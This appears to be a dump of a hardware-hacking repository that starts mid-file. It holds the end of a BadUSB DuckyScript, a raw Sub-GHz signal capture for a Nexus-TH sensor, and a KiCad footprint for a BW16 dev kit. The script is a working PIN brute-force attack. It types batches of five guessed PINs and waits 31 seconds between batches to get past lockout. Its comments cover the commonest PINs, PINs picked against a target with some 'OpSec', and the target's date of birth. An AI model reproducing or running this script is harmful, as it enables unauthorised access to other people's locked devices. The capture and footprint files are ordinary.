292 | ENTER 293 | DELAY 31000 294 | 295 | DELAY 500 296 | STRING 1001 297 | DELAY 500 298 | ENTER 299 | DELAY 500 300 | STRING 7410 301 | DELAY 500 302 | ENTER 303 | DELAY 500 304 | STRING 1020 305 | DELAY 500 306 | ENTER 307 | DELAY 500 308 | STRING 1223 309 | DELAY 500 310 | ENTER 311 | DELAY 500 312 | STRING 1029 313 | DELAY 500 314 | ENTER 315 | DELAY 500 316 | STRING x 317 | DELAY 500 318 | ENTER 319 | DELAY 31000 320 | 321 | DELAY 500 322 | STRING 1515 323 | DELAY 500 324 | ENTER 325 | DELAY 500 326 | STRING 1213 327 | DELAY 500 328 | ENTER 329 | DELAY 500 330 | STRING 2345 331 | DELAY 500 332 | ENTER 333 | DELAY 500 334 | STRING 2424 335 | DELAY 500 336 | ENTER 337 | DELAY 500 338 | STRING 2525 339 | DELAY 500 340 | ENTER 341 | DELAY 500 342 | STRING x 343 | DELAY 500 344 | ENTER 345 | DELAY 31000 346 | DELAY 500 347 | ENTER 348 | 349 | REM Set dervived from the most commonly appearing digits over an average of 1000 most used pins (0123) 350 | 351 | DELAY 500 352 | ENTER 353 | DELAY 500 354 | STRING 0123 355 | DELAY 500 356 | ENTER 357 | DELAY 500 358 | STRING 1023 359 | DELAY 500 360 | ENTER 361 | DELAY 500 362 | STRING 1203 363 | DELAY 500 364 | ENTER 365 | DELAY 500 366 | STRING 3210 367 | DELAY 500 368 | ENTER 369 | DELAY 500 370 | STRING 2112 371 | DELAY 500 372 | ENTER 373 | DELAY 500 374 | STRING x 375 | DELAY 500 376 | ENTER 377 | DELAY 31000 378 | 379 | DELAY 500 380 | STRING 2121 381 | DELAY 500 382 | ENTER 383 | DELAY 500 384 | STRING 1320 385 | DELAY 500 386 | ENTER 387 | DELAY 500 388 | STRING 3110 389 | DELAY 500 390 | ENTER 391 | DELAY 500 392 | STRING 2111 393 | DELAY 500 394 | ENTER 395 | DELAY 500 396 | STRING 0321 397 | DELAY 500 398 | ENTER 399 | DELAY 500 400 | STRING x 401 | DELAY 500 402 | ENTER 403 | DELAY 31000 404 | DELAY 500 405 | ENTER 406 | 407 | REMIncluding the 5 least used pins to factor in target having some OpSec 408 | 409 | DELAY 500 410 | ENTER 411 | DELAY 500 412 | STRING 8068 413 | DELAY 500 414 | ENTER 415 | DELAY 500 416 | STRING 8093 417 | DELAY 500 418 | ENTER 419 | DELAY 500 420 | STRING 6835 421 | DELAY 500 422 | ENTER 423 | DELAY 500 424 | STRING 9629 425 | DELAY 500 426 | ENTER 427 | DELAY 500 428 | STRING 7637 429 | DELAY 500 430 | ENTER 431 | DELAY 500 432 | STRING x 433 | DELAY 500 434 | ENTER 435 | DELAY 31000 436 | DELAY 500 437 | ENTER 438 | 439 | REM Last ditch effort with 4 sets of randomly generated pins 440 | 441 | DELAY 500 442 | ENTER 443 | DELAY 500 444 | STRING 6364 445 | DELAY 500 446 | ENTER 447 | DELAY 500 448 | STRING 6364 449 | DELAY 500 450 | ENTER 451 | DELAY 500 452 | STRING 6260 453 | DELAY 500 454 | ENTER 455 | DELAY 500 456 | STRING 8647 457 | DELAY 500 458 | ENTER 459 | DELAY 500 460 | STRING 0420 461 | DELAY 500 462 | ENTER 463 | DELAY 500 464 | STRING x 465 | DELAY 500 466 | ENTER 467 | DELAY 31000 468 | DELAY 500 469 | ENTER 470 | 471 | 472 | DELAY 500 473 | ENTER 474 | DELAY 500 475 | STRING 8880 476 | DELAY 500 477 | ENTER 478 | DELAY 500 479 | STRING 8631 480 | DELAY 500 481 | ENTER 482 | DELAY 500 483 | STRING 1121 484 | DELAY 500 485 | ENTER 486 | DELAY 500 487 | STRING 2996 488 | DELAY 500 489 | ENTER 490 | DELAY 500 491 | STRING 6685 492 | DELAY 500 493 | ENTER 494 | DELAY 500 495 | STRING x 496 | DELAY 500 497 | ENTER 498 | DELAY 31000 499 | DELAY 500 500 | ENTER 501 | 502 | 503 | DELAY 500 504 | ENTER 505 | DELAY 500 506 | STRING 9371 507 | DELAY 500 508 | ENTER 509 | DELAY 500 510 | STRING 3417 511 | DELAY 500 512 | ENTER 513 | DELAY 500 514 | STRING 9826 515 | DELAY 500 516 | ENTER 517 | DELAY 500 518 | STRING 2621 519 | DELAY 500 520 | ENTER 521 | DELAY 500 522 | STRING 8431 523 | DELAY 500 524 | ENTER 525 | DELAY 500 526 | STRING x 527 | DELAY 500 528 | ENTER 529 | DELAY 31000 530 | DELAY 500 531 | ENTER 532 | 533 | 534 | DELAY 500 535 | ENTER 536 | DELAY 500 537 | STRING 1185 538 | DELAY 500 539 | ENTER 540 | DELAY 500 541 | STRING 2281 542 | DELAY 500 543 | ENTER 544 | DELAY 500 545 | STRING 5519 546 | DELAY 500 547 | ENTER 548 | DELAY 500 549 | STRING 8657 550 | DELAY 500 551 | ENTER 552 | DELAY 500 553 | STRING 6435 554 | DELAY 500 555 | ENTER 556 | DELAY 500 557 | STRING x 558 | DELAY 500 559 | ENTER 560 | DELAY 31000 561 | DELAY 500 562 | ENTER 563 | 564 | REM If DOB for target is known uncomment and replace xxxx with MMDD, DDMM or YYYY 565 | REM Left at end of script on purpose to keep everything in groups of 5 566 | 567 | REM DELAY 500 568 | REM STRING xxxx 569 | DELAY 500 570 | ENTER 571 | REM DELAY 500 572 | REM STRING xxxx 573 | DELAY 500 574 | ENTER 575 | REM DELAY 500 576 | REM STRING xxxx 577 | DELAY 500 578 | ENTER 579 | REM DELAY 500 580 | REM STRING x 581 | 582 | -------------------------------------------------------------------------------- /subghz/nexus-th/temp.txt: -------------------------------------------------------------------------------- 1 | 957 -14254 2 | 65 -198 3 | 165 -200 4 | 165 -696 5 | 10927 -12634 6 | 97 -68 7 | 65 -2570 8 | 97 -1084 9 | 397 -98 10 | 491 -98 11 | 297 -96 12 | 423 -1040 13 | 449 -1042 14 | 449 -2012 15 | 489 -1012 16 | 481 -2004 17 | 479 -1020 18 | 481 -1012 19 | 487 -2010 20 | 483 -3990 21 | 527 -1018 22 | 479 -2000 23 | 515 -1008 24 | 485 -1010 25 | 481 -1980 26 | 489 -1008 27 | 481 -1022 28 | 477 -1992 29 | 507 -1968 30 | 517 -988 31 | 479 -1006 32 | 505 -986 33 | 505 -1016 34 | 467 -1010 35 | 505 -1000 36 | 471 -1018 37 | 515 -1992 38 | 489 -1996 39 | 483 -1006 40 | 481 -986 41 | 517 -1988 42 | 461 -1006 43 | 507 -1972 44 | 471 -1042 45 | 499 -1972 46 | 503 -1980 47 | 481 -1996 48 | 481 -1992 49 | 487 -1006 50 | 479 -1018 51 | 479 -1968 52 | 519 -994 53 | 513 -2002 54 | 477 -1008 55 | 487 -1008 56 | 481 -1980 57 | 509 -3992 58 | 541 -996 59 | 481 -1998 60 | 487 -1002 61 | 479 -1010 62 | 483 -1994 63 | 491 -1010 64 | 481 -1020 65 | 477 -2004 66 | 481 -2012 67 | 477 -984 68 | 511 -1012 69 | 459 -1040 70 | 479 -984 71 | 511 -1008 72 | 471 -1030 73 | 487 -996 74 | 515 -2000 75 | 477 -1998 76 | 447 -1020 77 | 481 -1022 78 | 477 -1992 79 | 483 -1000 80 | 515 -1966 81 | 481 -1034 82 | 483 -2006 83 | 471 -2004 84 | 481 -1980 85 | 505 -1970 86 | 473 -1010 87 | 491 -1008 88 | 473 -2000 89 | 481 -1018 90 | 513 -1998 91 | 475 -1006 92 | 489 -1008 93 | 479 -2010 94 | 511 -3974 95 | 503 -984 96 | 511 -1970 97 | 483 -1018 98 | 479 -1006 99 | 503 -1962 100 | 509 -1016 101 | 479 -1006 102 | 471 -2014 103 | 485 -2000 104 | 471 -1016 105 | 505 -978 106 | 505 -1004 107 | 487 -1020 108 | 477 -1016 109 | 479 -1012 110 | 489 -1008 111 | 513 -1988 112 | 457 -2012 113 | 481 -1006 114 | 473 -1016 115 | 481 -2010 116 | 471 -1000 117 | 515 -1948 118 | 505 -1020 119 | 511 -1988 120 | 459 -2012 121 | 479 -1972 122 | 483 -2016 123 | 461 -1008 124 | 503 -980 125 | 511 -1966 126 | 515 -990 127 | 513 -2002 128 | 475 -1008 129 | 487 -1004 130 | 473 -2004 131 | 517 -3980 132 | 505 -984 133 | 511 -1970 134 | 483 -1020 135 | 481 -1008 136 | 471 -2010 137 | 487 -1006 138 | 475 -1014 139 | 503 -1978 140 | 513 -1970 141 | 513 -1002 142 | 487 -1008 143 | 481 -988 144 | 513 -1008 145 | 485 -1010 146 | 483 -1018 147 | 483 -992 148 | 513 -1998 149 | 471 -1980 150 | 479 -1014 151 | 497 -1016 152 | 469 -2004 153 | 475 -1004 154 | 491 -2002 155 | 477 -1004 156 | 523 -1972 157 | 487 -1976 158 | 483 -2012 159 | 485 -1968 160 | 483 -1000 161 | 517 -1010 162 | 483 -1976 163 | 491 -1010 164 | 511 -1970 165 | 515 -990 166 | 481 -1008 167 | 485 -1990 168 | 529 -3994 169 | 499 -1022 170 | 479 -1994 171 | 483 -998 172 | 483 -1042 173 | 447 -2012 174 | 487 -1010 175 | 481 -988 176 | 513 -1966 177 | 519 -1978 178 | 507 -1012 179 | 475 -1006 180 | 473 -1028 181 | 481 -998 182 | 481 -1042 183 | 447 -1020 184 | 481 -1022 185 | 515 -1970 186 | 511 -1966 187 | 485 -1034 188 | 483 -990 189 | 481 -1994 190 | 481 -998 191 | 517 -1966 192 | 481 -1034 193 | 519 -1972 194 | 473 -2004 195 | 481 -1982 196 | 501 -1972 197 | 475 -1004 198 | 493 -1006 199 | 479 -2006 200 | 479 -1016 201 | 511 -1970 202 | 481 -1034 203 | 487 -1008 204 | 481 -1974 205 | 529 -3988 206 | 501 -980 207 | 511 -1968 208 | 483 -1020 209 | 479 -1032 210 | 473 -1978 211 | 503 -978 212 | 509 -1006 213 | 471 -1994 214 | 527 -1974 215 | 469 -1042 216 | 463 -1014 217 | 479 -1014 218 | 503 -984 219 | 509 -978 220 | 509 -1008 221 | 471 -1032 222 | 521 -1968 223 | 487 -1982 224 | 481 -1010 225 | 483 -1020 226 | 479 -1976 227 | 497 -1016 228 | 469 -2006 229 | 473 -1008 230 | 527 -1968 231 | 501 -1976 232 | 479 -2008 233 | 477 -1974 234 | 501 -1014 235 | 467 -1010 236 | 479 -2010 237 | 479 -1018 238 | 513 -1964 239 | 513 -974 240 | 515 -1008 241 | 483 -1982 242 | 505 -3998 243 | 537 -992 244 | 481 -2000 245 | 481 -998 246 | 481 -1010 247 | 483 -1994 248 | 491 -1008 249 | 475 -1014 250 | 503 -1972 251 | 515 -2002 252 | 479 -1004 253 | 487 -1004 254 | 475 -1014 255 | 503 -1008 256 | 477 -1016 257 | 481 -1012 258 | 459 -1052 259 | 509 -1956 260 | 497 -1976 261 | 507 -1010 262 | 471 -1022 263 | 479 -1974 264 | 487 -1016 265 | 489 -1964 266 | 503 -1016 267 | 503 -1976 268 | 499 -1976 269 | 479 -2006 270 | 477 -1978 271 | 503 -1020 272 | 477 -982 273 | 511 -1964 274 | 485 -1020 275 | 513 -1998 276 | 475 -1010 277 | 493 -1006 278 | 473 -2004 279 | 515 -3976 280 | 541 -992 281 | 483 -1996 282 | 489 -1002 283 | 481 -1008 284 | 485 -1992 285 | 491 -1010 286 | 481 -1016 287 | 473 -2012 288 | 511 -1968 289 | 481 -1028 290 | 485 -1008 291 | 481 -1022 292 | 479 -1004 293 | 489 -1008 294 | 481 -1018 295 | 483 -992 296 | 517 -2002 297 | 477 -1968 298 | 481 -1032 299 | 471 -1018 300 | 501 -1966 301 | 471 -1040 302 | 477 -1974 303 | 487 -1016 304 | 523 -1970 305 | 485 -2012 306 | 447 -2010 307 | 487 -1968 308 | 481 -1038 309 | 485 -1008 310 | 481 -1974 311 | 491 -1006 312 | 507 -1992 313 | 487 -1004 314 | 481 -1008 315 | 481 -2012 316 | 525 -3986 317 | 497 -1022 318 | 481 -2002 319 | 483 -996 320 | 481 -1006 321 | 485 -1994 322 | 505 -978 323 | 511 -1008 324 | 471 -2008 325 | 485 -2004 326 | 475 -1004 327 | 493 -1008 328 | 479 -1018 329 | 469 -1012 330 | 493 -1010 331 | 479 -1016 332 | 473 -1020 333 | 543 -1954 334 | 497 -1974 335 | 477 -1016 336 | 499 -1010 337 | 469 -1998 338 | 471 -1008 339 | 507 -1974 340 | 501 -1014 341 | 499 -1974 342 | 499 -1976 343 | 513 -1970 344 | 481 -1970 345 | 503 -1022 346 | 477 -1016 347 | 477 -1972 348 | 515 -990 349 | 515 -1970 350 | 511 -1006 351 | 485 -1008 352 | 481 -157340 353 | 65 -830 354 | 131 -132 355 | 133 -898 356 | 131 -166 357 | 133 -1826 358 | 329 -66 359 | 131 -134 360 | 263 -134 361 | 265 -100 362 | 331 -166 363 | 1825 -98 364 | 14409 -14288 365 | 133 -100 366 | 97 -658 367 | 497 -198 368 | 461 -198 369 | 325 -100 370 | 163 -130 371 | 2179 -12808 372 | 261 -166 373 | 163 -130 374 | 65 -724 375 | 129 -232 376 | 65 -264 377 | 97 -66 378 | 131 -262 379 | 65 -328 380 | 65 -396 381 | 297 -98 382 | 327 -98 383 | 163 -98 384 | 229 -132 385 | 623 -100 386 | 1325 -64 387 | 3549 -12000 388 | 97 -130 389 | 65 -1052 390 | 131 -260 391 | 227 -130 392 | 1489 -132 393 | 133 -166 394 | 1027 -100 395 | 18767 -13146 396 | 165 -3256 397 | 199 -166 398 | 165 -66 399 | 267 -466 400 | 231 -528 401 | 14783 -12480 402 | 99 -294 403 | 65 -3562 404 | 527 -66 405 | 133 -334 406 | 233 -198 407 | 67 -66 408 | 297 -298 409 | 1159 -132 410 | 5959 -16328 411 | 65 -234 412 | 67 -100 413 | 659 -66 414 | 227 -522 415 | 1391 -15180 416 | 63 -2020 417 | 67 -2280 418 | 695 -66 419 | 365 -166 420 | 231 -298 421 | 2319 -12138 422 | 99 -4274 423 | 65 -100 424 | 297 -168 425 | 365 -132 426 | 299 -100 427 | 429 -66 428 | 1597 -100 429 | 1965 -14982 430 | 133 -134 431 | 265 -266 432 | 97 -100 433 | 197 -232 434 | 627 -100 435 | 131 -100 436 | 799 -68 437 | 65 -68 438 | 861 -64 439 | 15763 -12128 440 | 99 -66 441 | 99 -1122 442 | 99 -334 443 | 65 -1562 444 | 65 -756 445 | 657 -66 446 | 67 -168 447 | 497 -132 448 | 65 -232 449 | 1969 -68 450 | 14175 -12568 451 | 65 -132 452 | 295 -560 453 | 99 -66 454 | 229 -66 455 | 327 -66 456 | 261 -130 457 | 18497 -14530 458 | 197 -592 459 | 163 -98 460 | 163 -658 461 | 397 -196 462 | 195 -132 463 | 363 -790 464 | 99 -66 465 | 293 -13240 466 | 197 -2436 467 | 195 -132 468 | 65 -98 469 | 361 -132 470 | 131 -100 471 | 301 -400 472 | 199 -68 473 | 1831 -98 474 | 427 -12782 475 | 97 -360 476 | 195 -196 477 | 65 -232 478 | 299 -66 479 | 265 -200 480 | 295 -696 481 | 265 -198 482 | 593 -164 483 | 263 -198 484 | 1081 -12086 485 | 99 -1586 486 | 65 -296 487 | 97 -132 488 | 755 -164 489 | 763 -100 490 | 27601 -12916 491 | 99 -130 492 | 97 -3828 493 | 461 -66 494 | 263 -164 495 | 2669 -13576 496 | 65 -2306 497 | 65 -622 498 | 233 -100 499 | 99 -362 500 | 97 -330 501 | 293 -134 502 | 165 -100 503 | 261 -132 504 | 26051 -12538 505 | 65 -566 506 | 99 -302 507 | 99 -830 508 | 131 -500 509 | 367 -66 510 | 131 -466 511 | 593 -68 512 | 397 -66 513 | 429 -198 514 | 693 -66 515 | 15353 -10414 516 | 165 -134 517 | 99 -266 518 | 331 -232 519 | 99 -298 520 | 65 -98 521 | 497 -164 522 | 99 -300 523 | 331 -102 524 | 199 -66 525 | 199 -232 526 | 1249 -66 527 | 5801 -13016 528 | 99 -366 529 | 67 -2888 530 | 97 -196 531 | 361 -298 532 | 31521 -12358 533 | 457 -266 534 | 633 -166 535 | 131 -132 536 | 527 -264 537 | 197 -162 538 | 131 -132 539 | 197 -296 540 | 829 -66 541 | 229 -66 542 | 855 -64 543 | 7727 -10332 544 | 65 -566 545 | 265 -234 546 | 167 -430 547 | 65 -230 548 | 493 -166 549 | 97 -164 550 | 295 -132 551 | 99 -262 552 | 463 -66 553 | 629 -98 554 | 2315 -16028 555 | 99 -762 556 | 99 -566 557 | 457 -166 558 | 65 -166 559 | 133 -266 560 | 265 -332 561 | 365 -166 562 | 4255 -12116 563 | 99 -758 564 | 463 -132 565 | 65 -426 566 | 65 -890 567 | 97 -328 568 | 65 -196 569 | 97 -362 570 | 65 -166 571 | 589 -132 572 | 195 -198 573 | 261 -166 574 | 659 -98 575 | 335 -15660 576 | 63 -66 577 | 131 -1328 578 | 97 -1098 579 | 163 -932 580 | 295 -270 581 | 297 -168 582 | 297 -68 583 | 167 -100 584 | 165 -434 585 | 527 -66 586 | 163 -15266 587 | 67 -662 588 | 165 -1924 589 | 131 -198 590 | 97 -890 591 | 67 -130 592 | 327 -100 593 | 293 -132 594 | 423 -66 595 | 5595 -12982 596 | 65 -766 597 | -------------------------------------------------------------------------------- /pcb/bw16/devkit/BW16 dev kit_empreinte.kicad_mod: -------------------------------------------------------------------------------- 1 | (footprint "BW16 dev kit" (version 20240108) (generator "pcbnew") (generator_version "8.0") 2 | (layer "F.Cu") 3 | (property "Reference" "REF**" (at 0 -0.5 0)(unlocked yes) 4 | (layer "F.SilkS")(uuid "aabab17e-7858-429e-98f5-a0444b6c7c72") 5 | (effects (font (size 1 1) (thickness 0.1))) 6 | ) 7 | (property "Value" "BW16 dev kit" (at 0 1 0)(unlocked yes) 8 | (layer "F.Fab")(uuid "4e53a8a7-a6c3-4007-b200-f9852be95119") 9 | (effects (font (size 1 1) (thickness 0.15))) 10 | ) 11 | (property "Footprint" "" (at 0 0 0)(unlocked yes) 12 | (layer "F.Fab")(hide yes) 13 | (uuid "20cb4297-2b13-4bd2-9ba3-fe6521e83f0d") 14 | (effects (font (size 1 1) (thickness 0.15))) 15 | ) 16 | (property "Datasheet" "" (at 0 0 0)(unlocked yes) 17 | (layer "F.Fab")(hide yes) 18 | (uuid "e5c6d259-2eee-4d03-830d-e8cf17271eff") 19 | (effects (font (size 1 1) (thickness 0.15))) 20 | ) 21 | (property "Description" "" (at 0 0 0)(unlocked yes) 22 | (layer "F.Fab")(hide yes) 23 | (uuid "0fb0cce5-b5ed-48e1-b65a-3b613209f97e") 24 | (effects (font (size 1 1) (thickness 0.15))) 25 | ) 26 | (attr smd) 27 | (fp_rect (start 0 0) (end 25 49) 28 | (stroke (width 0.1) (type default)) (fill none) (layer "F.SilkS")(uuid "05062d05-1929-4c07-8e94-34e06dab4390")) 29 | (fp_line (start 0 37.93) (end 0 10.625) 30 | (stroke (width 0.1) (type solid)) (layer "F.Fab")(uuid "55115f82-366a-4392-ba44-4bc49c392f4a")) 31 | (fp_line (start 25 10.01) (end 25 37.95) 32 | (stroke (width 0.1) (type solid)) (layer "F.Fab")(uuid "99208993-5970-4f6e-b223-63457a037f22")) 33 | (fp_text user "PA13" (at 18.67 19.51 0)(unlocked yes) 34 | (layer "F.SilkS")(uuid "028d4ebb-7fa3-42af-a604-985331615465") 35 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 36 | ) 37 | (fp_text user "PA26" (at 2.63 22.09 0)(unlocked yes) 38 | (layer "F.SilkS")(uuid "03dc1a11-6448-4a7c-a4a5-386a51ef4d5c") 39 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 40 | ) 41 | (fp_text user "PA12" (at 18.6 22.04 0)(unlocked yes) 42 | (layer "F.SilkS")(uuid "1278bc94-21ab-4f8a-ba90-117c0beafb6d") 43 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 44 | ) 45 | (fp_text user "EN" (at 2.69 29.65 0)(unlocked yes) 46 | (layer "F.SilkS")(uuid "2835435a-6979-4fd3-ae1f-8c8d993b7711") 47 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 48 | ) 49 | (fp_text user "5v" (at 2.6 37.23 0)(unlocked yes) 50 | (layer "F.SilkS")(uuid "3098bba5-c4ea-42f3-b7a8-cd1e3933d9c6") 51 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 52 | ) 53 | (fp_text user "PB1_TX_1" (at 15.45 29.66 0)(unlocked yes) 54 | (layer "F.SilkS")(uuid "4f3dc30b-f823-4965-80c9-c1a16207147b") 55 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 56 | ) 57 | (fp_text user "PB2_RX1" (at 15.95 27.13 0)(unlocked yes) 58 | (layer "F.SilkS")(uuid "6c80e274-d5aa-4e19-bf80-94067330f44a") 59 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 60 | ) 61 | (fp_text user "GND" (at 2.72 32.22 0)(unlocked yes) 62 | (layer "F.SilkS")(uuid "83c3f77a-7cb7-4e25-a8d2-a2597a4c48de") 63 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 64 | ) 65 | (fp_text user "PA14" (at 18.56 17.06 0)(unlocked yes) 66 | (layer "F.SilkS")(uuid "87403ea9-ebe7-4863-880f-8540323b7fda") 67 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 68 | ) 69 | (fp_text user "GND" (at 2.52 11.92 0)(unlocked yes) 70 | (layer "F.SilkS")(uuid "a97a65eb-729a-44ba-a78e-bd797fc49beb") 71 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 72 | ) 73 | (fp_text user "PA27" (at 2.5 17.01 0)(unlocked yes) 74 | (layer "F.SilkS")(uuid "a9c63594-0f98-4e47-8f01-41b81d1fd988") 75 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 76 | ) 77 | (fp_text user "PA30" (at 2.5 14.55 0)(unlocked yes) 78 | (layer "F.SilkS")(uuid "b70ece84-df0c-4ebf-8566-0cdd37bedc14") 79 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 80 | ) 81 | (fp_text user "PB3" (at 19.41 24.53 0)(unlocked yes) 82 | (layer "F.SilkS")(uuid "c1244a70-8c2b-475c-bbde-71e685c15158") 83 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 84 | ) 85 | (fp_text user "PA15" (at 18.44 14.46 0)(unlocked yes) 86 | (layer "F.SilkS")(uuid "c7dc332b-7ae5-4e23-86e1-7e976b0489c1") 87 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 88 | ) 89 | (fp_text user "GND" (at 19.26 11.89 0)(unlocked yes) 90 | (layer "F.SilkS")(uuid "c95a1a96-f891-410c-9ace-12af30a06748") 91 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 92 | ) 93 | (fp_text user "BW16 Dev Kit AIThinker" (at 3.89 47.62 0)(unlocked yes) 94 | (layer "F.SilkS")(uuid "cc98b9ab-f4da-48b1-b07f-860684d3b351") 95 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 96 | ) 97 | (fp_text user "PA8_LOG_RX0" (at 2.66 24.54 0)(unlocked yes) 98 | (layer "F.SilkS")(uuid "d1691434-e03a-408c-afdb-cb16fcba0029") 99 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 100 | ) 101 | (fp_text user "PA7_LOG_TX0" (at 2.75 27.26 0)(unlocked yes) 102 | (layer "F.SilkS")(uuid "d8d91e75-1669-47e8-8394-66f00d7cafa6") 103 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 104 | ) 105 | (fp_text user "5v" (at 20.81 37.32 0)(unlocked yes) 106 | (layer "F.SilkS")(uuid "db0b391a-f82b-4c74-b234-b291dd082c2c") 107 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 108 | ) 109 | (fp_text user "GND" (at 19.57 32.27 0)(unlocked yes) 110 | (layer "F.SilkS")(uuid "db9f928c-df9d-4dc1-b5d0-2f8b151a2cfb") 111 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 112 | ) 113 | (fp_text user "3v3" (at 2.78 34.72 0)(unlocked yes) 114 | (layer "F.SilkS")(uuid "e0ed3791-6544-47e8-92b1-22758b6c3c4c") 115 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 116 | ) 117 | (fp_text user "3v3" (at 19.84 34.68 0)(unlocked yes) 118 | (layer "F.SilkS")(uuid "e10bf493-1f6a-47a7-b863-5c8f440e35b1") 119 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 120 | ) 121 | (fp_text user "PA25" (at 2.55 19.58 0)(unlocked yes) 122 | (layer "F.SilkS")(uuid "f9b4412d-bbd4-4f0a-a10d-4278fd928e69") 123 | (effects (font (size 1 1) (thickness 0.1)) (justify left bottom)) 124 | ) 125 | (fp_text user "${REFERENCE}" (at 1.27 23.96 90) (layer "F.Fab")(uuid "49d54fef-673b-441c-b912-6e35f59d15fc") 126 | (effects (font (size 1 1) (thickness 0.15))) 127 | ) 128 | (fp_text user "${REFERENCE}" (at 0 2.5 0)(unlocked yes) 129 | (layer "F.Fab")(uuid "96ab5f02-dca1-4947-bb76-d9728c881638") 130 | (effects (font (size 1 1) (thickness 0.15))) 131 | ) 132 | (pad "1" thru_hole oval (at 23.73 11.28) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 133 | 134 | (uuid "820fe75b-0de4-4092-a48b-5c3fa98b1b40") 135 | ) 136 | (pad "2" thru_hole oval (at 23.73 13.82) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 137 | 138 | (uuid "236d7d2c-fa47-4167-a857-a1aebde565a5") 139 | ) 140 | (pad "3" thru_hole oval (at 23.73 16.36) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 141 | 142 | (uuid "5c88bbaa-6f14-4234-b249-07b45fca789c") 143 | ) 144 | (pad "4" thru_hole oval (at 23.73 18.9) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 145 | 146 | (uuid "09963930-7ab0-43ea-a526-a56df33868e8") 147 | ) 148 | (pad "5" thru_hole oval (at 23.73 21.44) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 149 | 150 | (uuid "4e225f2d-3aec-4db3-8cc9-eefc8624cc20") 151 | ) 152 | (pad "6" thru_hole oval (at 23.73 23.98) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 153 | 154 | (uuid "6da176ce-8fa6-46a9-8016-f231757df886") 155 | ) 156 | (pad "7" thru_hole oval (at 23.73 26.52) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 157 | 158 | (uuid "7caee65b-7a82-4016-a3f0-acdfb266b19d") 159 | ) 160 | (pad "8" thru_hole oval (at 23.73 29.06) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 161 | 162 | (uuid "a156b94b-827e-4c7e-a8c5-55d9ba98e628") 163 | ) 164 | (pad "9" thru_hole oval (at 23.73 31.6) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 165 | 166 | (uuid "3b313660-24fe-43cf-95ad-880a8ce253e1") 167 | ) 168 | (pad "10" thru_hole oval (at 23.73 34.14) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 169 | 170 | (uuid "f12fbb0a-28d4-4116-bd09-df86936423a0") 171 | ) 172 | (pad "11" thru_hole oval (at 23.73 36.68) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 173 | 174 | (uuid "3f1745e0-0cba-4e69-8f6e-1a69fccd1481") 175 | ) 176 | (pad "12" thru_hole oval (at 1.27 11.26) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 177 | 178 | (uuid "801961e0-edef-45df-b650-497255f2df7d") 179 | ) 180 | (pad "13" thru_hole oval (at 1.27 13.8) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 181 | 182 | (uuid "91aca984-9472-4097-baa9-8bf5c0e90c6c") 183 | ) 184 | (pad "14" thru_hole oval (at 1.27 16.34) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 185 | 186 | (uuid "0c007358-066a-4aa5-a431-f31551fe837e") 187 | ) 188 | (pad "15" thru_hole oval (at 1.27 18.88) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 189 | 190 | (uuid "8b88a895-7ae6-4322-bf47-da8d2f2d5f61") 191 | ) 192 | (pad "16" thru_hole oval (at 1.27 21.42) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 193 | 194 | (uuid "10d9c0b1-d90f-4987-83f8-c943f4ea260c") 195 | ) 196 | (pad "17" thru_hole oval (at 1.27 23.96) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 197 | 198 | (uuid "2ea8a4a1-c51c-4553-b3a0-5ece3bc10cf1") 199 | ) 200 | (pad "18" thru_hole oval (at 1.27 26.5) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 201 | 202 | (uuid "518c30e3-b81a-4d43-ad01-72c06f162ff9") 203 | ) 204 | (pad "19" thru_hole oval (at 1.27 29.04) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 205 | 206 | (uuid "6997b1d4-2828-4a54-bd05-d601db759374") 207 | ) 208 | (pad "20" thru_hole oval (at 1.27 31.58) (size 1.7 1.7) (drill 1) (layers "*.Cu" "*.Mask")(remove_unused_layers no) 